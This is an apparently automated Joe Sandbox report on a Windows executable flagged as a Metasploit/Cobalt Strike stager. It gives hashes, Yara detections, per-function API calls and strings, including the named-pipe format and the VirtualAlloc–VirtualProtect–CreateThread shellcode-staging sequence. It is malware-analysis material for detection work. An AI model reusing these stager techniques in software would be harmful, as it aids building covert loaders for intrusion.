Path:	C:\Users\user\AppData\Local\Temp\tmpE651.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\tmpE651.exe"
Imagebase:	0x400000
File size:	19'456 bytes
MD5 hash:	A7E64FEA00D97B963D90E53093D5E220
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:27:06
Start date:	30/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 3848 -s 1116
Imagebase:	0x7ff695aa0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FFD9B8505BE Relevance: 2.0, Strings: 1, Instructions: 762COMMON

Download Yara Rule

Strings

5@_H, xrefs: 00007FFD9B85075F

Memory Dump Source

Source File: 00000000.00000002.1729406691.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd

Similarity

API ID:
String ID: 5@_H
API String ID: 0-3541029494
Opcode ID: c5cd6a1265293f2cfcef8d62a4476dfa82cb86ecca8e6ac1254162600c16ad58
Instruction ID: 425a645cb56d537b73a092cdec12bcfb9f0b04b6c0790640e60661dc8ea7f9c5
Opcode Fuzzy Hash: c5cd6a1265293f2cfcef8d62a4476dfa82cb86ecca8e6ac1254162600c16ad58
Instruction Fuzzy Hash: 77225932B1EB8D4FE7A69BAC48655B47BE1EF5B610B0901FBD08DC71A3D954AC06C381

Function 00007FFD9B850000 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1729406691.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f5c982ab21935446619d6720832cd18635fecfaa99960aebe724ce8392f23cd
Instruction ID: d4c1a58989f6c23b36524b3c7a2c1784d85372c196c4139c615b1279eb54c177
Opcode Fuzzy Hash: 7f5c982ab21935446619d6720832cd18635fecfaa99960aebe724ce8392f23cd
Instruction Fuzzy Hash: 74122822A1EBCE4FD7629BA848796B47FE1EF5B610B0A40FBD04CCB1A3D9589D05C351

Function 00007FFD9B850400 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1729406691.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81f2bcd0cb7aef295d96f30d89456bbb5c8705b300e14065549655be39db009c
Instruction ID: 1eb99c4d3d61f95a569991d42c84a2f650d718b5aa38e0af235a729096238739
Opcode Fuzzy Hash: 81f2bcd0cb7aef295d96f30d89456bbb5c8705b300e14065549655be39db009c
Instruction Fuzzy Hash: FF410631A1EA894FD7A69BA884686707BE1EF5A304F4A40FBD04DCB1A3DA18EC45C741

Function 00007FFD9B850A57 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1729406691.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 482e5143e829035655cf72f847831765cc3f5aed309d9e4282a49f1bf276882d
Instruction ID: 8ab45c52be7c18648b1bea3872a4d7654832bea37f3f81dcb3bc5b6a823384b4
Opcode Fuzzy Hash: 482e5143e829035655cf72f847831765cc3f5aed309d9e4282a49f1bf276882d
Instruction Fuzzy Hash: 0A11EC22F3FD0E4FE7BA97DC557217D22C2EF49A10B4601F9E40DC21E6DE5869021381

Function 00007FFD9B784915 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1729052066.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
Instruction ID: da149d379224387e32e8b8b5eda8ddfe71311dbbbbf26bb8a326a8a06e988265
Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
Instruction Fuzzy Hash: 8401A73020CB0C4FD748EF0CE091AA5B3E0FB85321F10056DE58AC36A1D632E881CB41

Analysis Process: tmpE651.exePID: 3848, Parent PID: 4312COMMON

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	0.9%
Signature Coverage:	14.4%
Total number of Nodes:	215
Total number of Limit Nodes:	6

Callgraph

Hide Legend

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00401180 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 196
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 004011E6
SetUnhandledExceptionFilter.KERNEL32 ref: 00401258
malloc.MSVCRT ref: 00401322
strlen.MSVCRT ref: 00401345
malloc.MSVCRT ref: 00401351
memcpy.MSVCRT ref: 00401365
GetStartupInfoA.KERNEL32 ref: 00401463

Strings

@P@, xrefs: 00401231

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
String ID: @P@
API String ID: 649803965-1136412694
Opcode ID: b78087a4727109617a980b8b34e7f88b19eb7fde71d655465aeb3eeb3b98bcac
Instruction ID: 0837f65e99a2b31b617579b96e5607858f818787d00fb595da640d4b13c89ff1
Opcode Fuzzy Hash: b78087a4727109617a980b8b34e7f88b19eb7fde71d655465aeb3eeb3b98bcac
Instruction Fuzzy Hash: FB7199B2601B0486EB259F56E99476A33A1F745B88F84803BEF49773A1DF7CC884C748

Function 00401630 Relevance: 6.0, APIs: 4, Instructions: 50
pipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeA.KERNEL32 ref: 0040167C
ConnectNamedPipe.KERNEL32 ref: 00401699
WriteFile.KERNEL32 ref: 004016BC
CloseHandle.KERNEL32 ref: 004016C9

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: NamedPipe$CloseConnectCreateFileHandleWrite
String ID:
API String ID: 2239253087-0
Opcode ID: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
Instruction ID: 792960597df4a3593b3ed71ec0f1f42691249fcecf88183cb5a5311cb3ffe816
Opcode Fuzzy Hash: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
Instruction Fuzzy Hash: 7311A57171464487E7208B12EC4871B7660B785BA4F588639EF59277E4DF7DC409CB08

Function 004017F8 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 54
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 004017B9
SleepEx.KERNELBASE ref: 004017CD

Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784

GetTickCount.KERNEL32 ref: 004017FC
CreateThread.KERNEL32 ref: 00401885

Strings

p, xrefs: 00401831
@@, xrefs: 004017AE
\, xrefs: 00401839
p, xrefs: 00401821
., xrefs: 00401841
e, xrefs: 00401819
%c%c%c%c%c%c%c%c%cMSSE-%d-server, xrefs: 0040185A
i, xrefs: 00401829
\, xrefs: 00401811

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
API String ID: 3660650057-1020837823
Opcode ID: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
Instruction ID: b1b191c08856ce7a5ac3e1961f061f1fb3c952ac0291ac520aaac2e6cde2bc09
Opcode Fuzzy Hash: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
Instruction Fuzzy Hash: BB11E1B2214A80C6F714DF62F84975BBBA0F384749F44412ADB49277A8CB7CC445CF48

Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 004015BC
VirtualProtect.KERNEL32 ref: 004015F6
CreateThread.KERNEL32 ref: 0040161B

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: Virtual$AllocCreateProtectThread
String ID:
API String ID: 3039780055-0
Opcode ID: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
Instruction ID: a871edb487987511a762a7aedd3aa3d9a3b96542bc8ba466cbe2f33faf2e38cc
Opcode Fuzzy Hash: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
Instruction Fuzzy Hash: 3D012B9231558051E7249B73AC08B9AAA91A38DBC9F48C139EF4B5BBA5DA3CC505C708

Function 00401704 Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 0040174D
ReadFile.KERNEL32 ref: 00401777
CloseHandle.KERNEL32 ref: 00401784

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: File$CloseCreateHandleRead
String ID:
API String ID: 1035965006-0
Opcode ID: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
Instruction ID: 40b2c8f30f00ef97869f90130fa51706c158e82a26dd4cfec866ebc6162fc2d5
Opcode Fuzzy Hash: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
Instruction Fuzzy Hash: 2101F77531460186E7219B16F90471776A0B394BA4F648339EFA917BD4DB7DC50ACB08

Function 001D0128 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(00000000,00000000,84400200,00000000), ref: 001D0143

Strings

U.;, xrefs: 001D013E

Memory Dump Source

Source File: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d0000_tmpE651.jbxd

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: U.;
API String ID: 1984915467-4213443877
Opcode ID: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
Instruction ID: 767248024086661c30a9dc68eb7a0cf621d7fd2920bd6f6d9c9f0a41f2afc3c3
Opcode Fuzzy Hash: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
Instruction Fuzzy Hash: EB116D6034980D1BE61D95AE7C9A73A11CAE7DC765F25823FB40EC33D9EE54CC83816A

Function 00403040 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885

SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: Sleep$CountCreateThreadTickmalloc
String ID:
API String ID: 345437100-0
Opcode ID: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
Instruction ID: 8364c3e29ff4e62ba415e97045e67fc6fb748e7a580f304519b0ce082c56ecd4
Opcode Fuzzy Hash: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
Instruction Fuzzy Hash: B4C022A030208880EF08B3B280AB32E0A080B08388F0C083FEF0B322E28C3CC000030E

Non-executed Functions

Function 00401A70 Relevance: 12.0, APIs: 8, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCaptureContext.KERNEL32 ref: 00401A84
RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
RtlVirtualUnwind.KERNEL32 ref: 00401ADD
SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
GetCurrentProcess.KERNEL32 ref: 00401B34
TerminateProcess.KERNEL32 ref: 00401B42
abort.MSVCRT ref: 00401B48

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
String ID:
API String ID: 4278921479-0
Opcode ID: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
Instruction ID: cf336b0ec7d2cb6baae35a739632777ca23f94a65b3f666190a75c6fcbb7d788
Opcode Fuzzy Hash: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
Instruction Fuzzy Hash: B5210FB5202F45E9EB009B61F98438A33B4BB08B88F40452ADF8E27775EF38C519C708

Function 00401990 Relevance: 7.6, APIs: 5, Instructions: 56
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
GetCurrentProcessId.KERNEL32 ref: 004019E0
GetCurrentThreadId.KERNEL32 ref: 004019E8
GetTickCount.KERNEL32 ref: 004019F0
QueryPerformanceCounter.KERNEL32 ref: 004019FE

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
Instruction ID: 088ae4e322ac71afa1741572681cd55a149c1471ea95f8004f9c9491386c013f
Opcode Fuzzy Hash: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
Instruction Fuzzy Hash: AA1170A6756B1092FB209B25F90431973A0B788BF4F081A759F9D53BB4DA3CC986C708

Function 004092E4 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
Instruction ID: 040a81dcf2f050336bda00ad6163e1b97f4a0e7d9bd373c2026e90d71216a3c6
Opcode Fuzzy Hash: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
Instruction Fuzzy Hash: 4DD0C7D7F5DFD096D32281A40CB60593F91B4F291031E80AF4E40A33D3741C1C055315

Function 00402F69 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19992302b57e0ae1e896caf69d358159d2cdd7c295cfb7410856e5c68f34a958
Instruction ID: 82f505fb4451acb9e8d1e12f81e5a21f5fcc3540fe401e05c5c992db50528185
Opcode Fuzzy Hash: 19992302b57e0ae1e896caf69d358159d2cdd7c295cfb7410856e5c68f34a958
Instruction Fuzzy Hash: 62A0029244DD0290E3101B40D9413A07279D306240F0424A6421461072853D8520414C

Function 00401D50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 00401E69

Strings

Mingw-w64 runtime failure:, xrefs: 00401D88
Address %p has no image-section, xrefs: 00401DC0
VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
VirtualProtect failed with code 0x%x, xrefs: 00401F56

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
Instruction ID: 10d76aa513752d408286ffc26ec959f6f169e193d9772deefbdc98a11bb0eab9
Opcode Fuzzy Hash: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
Instruction Fuzzy Hash: 2C51DFB2701B4086DB109F26E94475E77A1F799BA4F58423AEF98233E1EA3CC485C748

Function 004025E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

signal.MSVCRT ref: 0040268A

Strings

CCG , xrefs: 004025F6

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
Instruction ID: 8a37928041284c8a434aeccdd4db6f983c568c8f0cf3e4f2934023fa32f313ab
Opcode Fuzzy Hash: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
Instruction Fuzzy Hash: C321A171B0154146EE296279865D33B10019B9A374F284E379A3DA73E0DEFECCC2830E

Function 00401FD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Unknown pseudo relocation bit size %d., xrefs: 00402294
Unknown pseudo relocation protocol version %d., xrefs: 004022A8

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 0-395989641
Opcode ID: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
Instruction ID: 42e0c3400c77c9dd47adb4fdb8995eb2357067ceb312bbd9be83e7c2f840df7f
Opcode Fuzzy Hash: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
Instruction Fuzzy Hash: 6A712272B10B9486DF10CF61DA0875A7761FB58BA8F58862ADF08377E8DB7DC540CA08

Function 00401DC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 00401E69

Strings

Address %p has no image-section, xrefs: 00401DC0, 00401FA5
VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 1804819252-157664173
Opcode ID: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
Instruction ID: 52aafb0f448170306d42bca5540912cc2139dda9d14def77d71a33c16101a6f6
Opcode Fuzzy Hash: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
Instruction Fuzzy Hash: 4B31E3B3702A4195EF118F12EA4175A3761BB95BA4F49413AEF4C273A1EF3CD486C788

Function 00401C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Unknown error, xrefs: 00401D2C

Memory Dump Source

Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
